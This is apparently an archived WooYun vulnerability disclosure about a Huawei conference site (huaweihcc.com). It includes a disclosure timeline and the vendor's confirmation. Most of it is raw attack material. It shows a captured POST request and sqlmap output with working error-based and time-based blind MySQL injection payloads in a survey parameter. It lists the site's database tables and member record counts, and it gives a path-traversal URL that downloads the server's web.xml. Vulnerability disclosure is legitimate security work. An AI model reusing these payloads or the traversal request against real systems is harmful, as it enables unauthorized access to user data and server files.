乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-06: 细节已通知厂商并且等待厂商处理中 2016-05-09: 厂商已经确认,细节仅向厂商公开 2016-05-19: 细节向核心白帽子及相关领域专家公开 2016-05-29: 细节向普通白帽子公开 2016-06-08: 细节向实习白帽子公开 2016-06-23: 细节向公众公开
我的辣条呢?
POST /web/member/memberSurveyAction!answerQuestion.do HTTP/1.1Content-Length: 2916Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: www.huaweihcc.comCookie: JSESSIONID=ADEB3C74B5159E2AC9A0AB6AC0C1050C-n1.jvm1; pvndwvyk=1Host: www.huaweihcc.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*answerList%5b0%5d.optionId=98&answerList%5b0%5d.optionValue=1&answerList%5b0%5d.otherOptionId=105&answerList%5b0%5d.questionId=13&answerList%5b0%5d.surveyId=2&answerList%5b1%5d.optionId=106&answerList%5b1%5d.optionValue=1&answerList%5b1%5d.otherOptionId=128&answerList%5b1%5d.questionId=14&answerList%5b1%5d.surveyId=2&answerList%5b2%5d.optionId=135&answerList%5b2%5d.questionId=15&answerList%5b2%5d.surveyId=2&answerList%5b3%5d.optionId=129&answerList%5b3%5d.optionValue=*&answerList%5b3%5d.otherOptionId=134&answerList%5b3%5d.questionId=16&answerList%5b3%5d.surveyId=2&answerList%5b4%5d.checkBoxOptionId=146&answerList%5b4%5d.checkBoxOptionId=150&answerList%5b4%5d.checkBoxOptionId=151&answerList%5b4%5d.checkBoxOptionId=143&answerList%5b4%5d.checkBoxOptionId=142&answerList%5b4%5d.checkBoxOptionId=145&answerList%5b4%5d.checkBoxOptionId=144&answerList%5b4%5d.checkBoxOptionId=149&answerList%5b4%5d.checkBoxOptionId=155&answerList%5b4%5d.checkBoxOptionId=154&answerList%5b4%5d.checkBoxOptionId=148&answerList%5b4%5d.checkBoxOptionId=152&answerList%5b4%5d.checkBoxOptionId=153&answerList%5b4%5d.checkBoxOptionId=147&answerList%5b4%5d.checkBoxOptionId=139&answerList%5b4%5d.checkBoxOptionId=140&answerList%5b4%5d.checkBoxOptionId=141&answerList%5b4%5d.optionValue=1&answerList%5b4%5d.otherOptionId=155&answerList%5b4%5d.questionId=17&answerList%5b4%5d.surveyId=2&answerList%5b5%5d.optionId=156&answerList%5b5%5d.questionId=18&answerList%5b5%5d.surveyId=2&answerList%5b6%5d.checkBoxOptionId=165&answerList%5b6%5d.checkBoxOptionId=164&answerList%5b6%5d.checkBoxOptionId=166&answerList%5b6%5d.checkBoxOptionId=171&answerList%5b6%5d.checkBoxOptionId=172&answerList%5b6%5d.checkBoxOptionId=173&answerList%5b6%5d.checkBoxOptionId=170&answerList%5b6%5d.checkBoxOptionId=167&answerList%5b6%5d.checkBoxOptionId=168&answerList%5b6%5d.checkBoxOptionId=169&answerList%5b6%5d.optionValue=1&answerList%5b6%5d.otherOptionId=173&answerList%5b6%5d.questionId=19&answerList%5b6%5d.surveyId=2&answerList%5b7%5d.optionId=174&answerList%5b7%5d.questionId=20&answerList%5b7%5d.surveyId=2&answerList%5b8%5d.checkBoxOptionId=178&answerList%5b8%5d.checkBoxOptionId=179&answerList%5b8%5d.checkBoxOptionId=176&answerList%5b8%5d.checkBoxOptionId=177&answerList%5b8%5d.checkBoxOptionId=181&answerList%5b8%5d.checkBoxOptionId=180&answerList%5b8%5d.optionValue=1&answerList%5b8%5d.otherOptionId=181&answerList%5b8%5d.questionId=21&answerList%5b8%5d.surveyId=2&answerList%5b9%5d.optionId=182&answerList%5b9%5d.questionId=22&answerList%5b9%5d.surveyId=2&siteId=5&struts.token.name=token&surveyMember.company=Baidua&surveyMember.country=AFG&surveyMember.genderCode=female&surveyMember.memberEmail=sample%40email.tst&surveyMember.memberMobile=987-65-4329&surveyMember.memberName=gchifnyx&token=FF0W0EV4KWRB3I4X4DY61XQPYGPEOV7F
---Parameter: #1* ((custom) POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: answerList[0].optionId=98&answerList[0].optionValue=1&answerList[0].otherOptionId=105&answerList[0].questionId=13&answerList[0].surveyId=2&answerList[1].optionId=106&answerList[1].optionValue=1&answerList[1].otherOptionId=128&answerList[1].questionId=14&answerList[1].surveyId=2&answerList[2].optionId=135&answerList[2].questionId=15&answerList[2].surveyId=2&answerList[3].optionId=129&answerList[3].optionValue=' AND (SELECT 6810 FROM(SELECT COUNT(*),CONCAT(0x716b767171,(SELECT (ELT(6810=6810,1))),0x716b787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Pesh'='Pesh&answerList[3].otherOptionId=134&answerList[3].questionId=16&answerList[3].surveyId=2&answerList[4].checkBoxOptionId=146&answerList[4].checkBoxOptionId=150&answerList[4].checkBoxOptionId=151&answerList[4].checkBoxOptionId=143&answerList[4].checkBoxOptionId=142&answerList[4].checkBoxOptionId=145&answerList[4].checkBoxOptionId=144&answerList[4].checkBoxOptionId=149&answerList[4].checkBoxOptionId=155&answerList[4].checkBoxOptionId=154&answerList[4].checkBoxOptionId=148&answerList[4].checkBoxOptionId=152&answerList[4].checkBoxOptionId=153&answerList[4].checkBoxOptionId=147&answerList[4].checkBoxOptionId=139&answerList[4].checkBoxOptionId=140&answerList[4].checkBoxOptionId=141&answerList[4].optionValue=1&answerList[4].otherOptionId=155&answerList[4].questionId=17&answerList[4].surveyId=2&answerList[5].optionId=156&answerList[5].questionId=18&answerList[5].surveyId=2&answerList[6].checkBoxOptionId=165&answerList[6].checkBoxOptionId=164&answerList[6].checkBoxOptionId=166&answerList[6].checkBoxOptionId=171&answerList[6].checkBoxOptionId=172&answerList[6].checkBoxOptionId=173&answerList[6].checkBoxOptionId=170&answerList[6].checkBoxOptionId=167&answerList[6].checkBoxOptionId=168&answerList[6].checkBoxOptionId=169&answerList[6].optionValue=1&answerList[6].otherOptionId=173&answerList[6].questionId=19&answerList[6].surveyId=2&answerList[7].optionId=174&answerList[7].questionId=20&answerList[7].surveyId=2&answerList[8].checkBoxOptionId=178&answerList[8].checkBoxOptionId=179&answerList[8].checkBoxOptionId=176&answerList[8].checkBoxOptionId=177&answerList[8].checkBoxOptionId=181&answerList[8].checkBoxOptionId=180&answerList[8].optionValue=1&answerList[8].otherOptionId=181&answerList[8].questionId=21&answerList[8].surveyId=2&answerList[9].optionId=182&answerList[9].questionId=22&answerList[9].surveyId=2&siteId=5&struts.token.name=token&surveyMember.company=Baidua&surveyMember.country=AFG&surveyMember.genderCode=female&[email protected]&surveyMember.memberMobile=987-65-4329&surveyMember.memberName=gchifnyx&token=FF0W0EV4KWRB3I4X4DY61XQPYGPEOV7F Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: answerList[0].optionId=98&answerList[0].optionValue=1&answerList[0].otherOptionId=105&answerList[0].questionId=13&answerList[0].surveyId=2&answerList[1].optionId=106&answerList[1].optionValue=1&answerList[1].otherOptionId=128&answerList[1].questionId=14&answerList[1].surveyId=2&answerList[2].optionId=135&answerList[2].questionId=15&answerList[2].surveyId=2&answerList[3].optionId=129&answerList[3].optionValue=' AND (SELECT * FROM (SELECT(SLEEP(5)))xisD) AND 'EqKa'='EqKa&answerList[3].otherOptionId=134&answerList[3].questionId=16&answerList[3].surveyId=2&answerList[4].checkBoxOptionId=146&answerList[4].checkBoxOptionId=150&answerList[4].checkBoxOptionId=151&answerList[4].checkBoxOptionId=143&answerList[4].checkBoxOptionId=142&answerList[4].checkBoxOptionId=145&answerList[4].checkBoxOptionId=144&answerList[4].checkBoxOptionId=149&answerList[4].checkBoxOptionId=155&answerList[4].checkBoxOptionId=154&answerList[4].checkBoxOptionId=148&answerList[4].checkBoxOptionId=152&answerList[4].checkBoxOptionId=153&answerList[4].checkBoxOptionId=147&answerList[4].checkBoxOptionId=139&answerList[4].checkBoxOptionId=140&answerList[4].checkBoxOptionId=141&answerList[4].optionValue=1&answerList[4].otherOptionId=155&answerList[4].questionId=17&answerList[4].surveyId=2&answerList[5].optionId=156&answerList[5].questionId=18&answerList[5].surveyId=2&answerList[6].checkBoxOptionId=165&answerList[6].checkBoxOptionId=164&answerList[6].checkBoxOptionId=166&answerList[6].checkBoxOptionId=171&answerList[6].checkBoxOptionId=172&answerList[6].checkBoxOptionId=173&answerList[6].checkBoxOptionId=170&answerList[6].checkBoxOptionId=167&answerList[6].checkBoxOptionId=168&answerList[6].checkBoxOptionId=169&answerList[6].optionValue=1&answerList[6].otherOptionId=173&answerList[6].questionId=19&answerList[6].surveyId=2&answerList[7].optionId=174&answerList[7].questionId=20&answerList[7].surveyId=2&answerList[8].checkBoxOptionId=178&answerList[8].checkBoxOptionId=179&answerList[8].checkBoxOptionId=176&answerList[8].checkBoxOptionId=177&answerList[8].checkBoxOptionId=181&answerList[8].checkBoxOptionId=180&answerList[8].optionValue=1&answerList[8].otherOptionId=181&answerList[8].questionId=21&answerList[8].surveyId=2&answerList[9].optionId=182&answerList[9].questionId=22&answerList[9].surveyId=2&siteId=5&struts.token.name=token&surveyMember.company=Baidua&surveyMember.country=AFG&surveyMember.genderCode=female&[email protected]&surveyMember.memberMobile=987-65-4329&surveyMember.memberName=gchifnyx&token=FF0W0EV4KWRB3I4X4DY61XQPYGPEOV7F---back-end DBMS: MySQL >= 5.0.0Database: hcc+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| tb_em_answer | 2001934 || hcc_member | 173091 || tb_em_survey_member | 116952 || hcc_member_copy | 51600 || hcc_member_bak_hcc2014 | 25989 || hcc_mdb_response | 11508 || hcc_email_send_record | 10383 || hcc_ticket | 9961 || hcc_email_send_record_copy | 9024 || tb_app_business_log | 4150 || hcc_bookagenda | 2971 || hcc_test | 2130 || hcc_member_copy0503 | 1567 || hcc_invite | 1322 || tr_em_member_site | 1248 || hcc_member_copy0426 | 1182 || tr_em_member_site_copy0426 | 998 || tr_em_member_site_copy0425 | 946 || hcc_webinar | 535 || hcc_order | 472 || hcc_agenda | 413 || hcc_agenda_20140916bak | 413 || hcc_speaker | 247 || hcc_country | 241 || hcc_survey_result | 220 || tb_em_option | 185 || tb_app_element | 126 || hcc_datum | 114 || hcc_picture | 91 || tr_app_role_menu_bakhcc2014 | 89 || hcc_resource_item | 86 || hcc_sponsor | 66 || tb_app_menu_bakhcc2014 | 50 || tb_app_element_group | 37 || hcc_cims_group | 29 || hcc_media | 29 || hcc_article | 26 || hcc_datum_catetory | 25 || hcc_email_template | 24 || tb_em_question | 22 || tr_app_role_menu | 21 || hcc_conferenceroom | 17 || tr_app_user_role | 17 || tb_app_menu | 16 || tb_app_user | 15 || hcc_lab_content | 11 || hcc_question_type | 10 || hcc_resource | 10 || hcc_survey_item | 10 || hcc_survey_question | 10 || tr_em_site_params | 9 || tb_app_params | 8 || tb_app_role | 8 || tb_em_site | 8 || tr_em_user_site | 7 || hcc_global_survey | 5 || tb_em_params | 5 || hcc_lab_handbook | 4 || hcc_member_topic | 4 || hcc_lab_librarytype | 2 || hcc_seq | 2 || tb_em_survey | 2 || hcc_media_meterial | 1 || hcc_survey | 1 || tb_app_organization | 1 || tb_em_prizes | 1 |+-----------------------------+---------+
任意文件下载www.huaweihcc.com/fileDownloadServlet?%20Enterprise%20Cloud%20Service_SAP_Open%20Version.pdf&fileName=../conf/web.xml&isFtp=1&sameName=1&selfilePath=europe/en/
~~
危害等级:高
漏洞Rank:10
确认时间:2016-05-09 09:37
感谢白帽子对华为公司安全的关注,我们已将该漏洞通知了业务部门整改。
暂无
